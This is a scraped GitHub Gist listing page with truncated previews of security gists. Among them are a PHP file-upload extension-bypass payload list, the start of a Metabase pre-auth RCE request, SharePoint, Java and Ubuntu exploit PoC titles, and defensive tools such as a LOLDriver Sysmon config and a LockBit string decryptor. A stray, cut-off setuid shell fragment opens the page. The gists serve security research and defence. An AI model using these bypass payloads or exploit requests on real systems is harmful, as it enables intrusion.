user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
habib26-14
testanull
/ SharePwn_public.py
Created
December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
7h3h4ckv157
/ .php
Last active
December 2, 2023 10:01
Best RCE payloads (PHP file upload) that I found on the Internet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| php%20 | |
| php%0a | |
| php%00 | |
| php%0d%0a | |
| php/ | |
| php.\ | |
| phar | |
| php.... | |
| pHp5.... | |
| phpJunk123png |
win3zz
/ GameOver(lay).md
Last active
January 3, 2025 05:42
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
win3zz
/ CVE-2023-21939.md
Created
August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept
Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
testanull
/ cve-2023-38646_poc.txt
Created
July 28, 2023 02:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/setup/validate HTTP/1.1 | |
| Host: localhost:3000 | |
| Content-Length: 416 | |
| Accept: application/json | |
| Content-Type: application/json | |
| User-Agent: Mozilla/5.0 | |
| Connection: close | |
| {"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ | |
| "subprotocol":"h2", |
jsecurity101
/ LOLDriverConfig.ps1
Last active
October 31, 2023 13:45
PowerShell script that creates an audit or block Sysmon config based off of LOLDrivers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Author: Jonathan Johnson (@jsecurity101) | |
| function New-DriverConfig { | |
| <# | |
| .EXAMPLE | |
| New-DriverConfig -Block | |
| Creates driver block config in the current directory | |
| .EXAMPLE |
aemmitt-ns
/ restricted.m
Created
May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dump classes and selectors forbidden in NSPredicates | |
| // `cc -framework Foundation -o restricted restricted.m` | |
| #import <Foundation/Foundation.h> | |
| #import <dlfcn.h> | |
| int main() { | |
| void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
| NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
| NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
| NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |
xpn
/ LAPSDecrypt.cs
Last active
October 11, 2024 18:16
Quick POC looking at how encryption works for LAPS (v2)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Security.Principal; | |
| using System.Text; |
X-Junior
/ lockbit_macos_string_decryption.py
Created
April 17, 2023 03:05
Static String Decryption For Lockbit 3.0 MacOS Variant
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Author: Mohamed Ashraf (@X__Junior) | |
| tested samples: | |
| 0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde | |
| 3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79 | |
| usage: | |
| python3 lockbit_macos_string_decryption.py sample.bin | |
| ''' |
tothi
/ msmq_detect.py
Created
April 17, 2023 00:09
Detect whether the remote MSMQ service on 1801/tcp is enabled or not by sending a valid message to the target
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # detect whether the remote MSMQ service on 1801/tcp is enabled or not | |
| # by sending a valid message to the target | |
| # | |
| # resources: | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqmq/b7cc2590-a617-45df-b6a3-1f31102b36fb | |
| # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/85498b96-f2c8-43b3-a108-c9d6269dc4af | |
| # |
NewerOlder